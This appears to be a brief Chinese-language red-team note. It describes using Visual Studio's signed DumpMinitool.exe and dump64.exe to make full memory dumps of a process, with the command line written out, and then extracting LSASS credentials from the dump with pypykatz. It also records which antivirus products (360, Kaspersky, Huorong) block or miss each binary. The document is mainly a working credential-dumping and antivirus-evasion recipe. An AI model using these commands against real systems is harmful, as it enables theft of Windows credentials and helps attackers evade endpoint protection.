DumpMinitool.exe

经测试,360和卡巴拦截,火绒正常

Visual Studio 2022 的一个程序,使用这个需要安装扩展开发

image-20220501020509596

1
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe

image-20220501020021810

使用命令

1
2
3
4
5
DumpMinitool.exe --file c:\users\public\test.txt --processId PID --dumpType Full

# 读取
pip install pypykatz
pypykatz lsa minidump 111.txt

image-20220501023509870

360拦截

image-20220501022407309

卡巴斯基拦截

image-20220501022554024

火绒不拦截

image-20220501022719006

dump64.exe

卡巴斯基拦截,火绒和360不拦截

360不拦截

image-20220501025143169

火绒不拦截

image-20220501025521687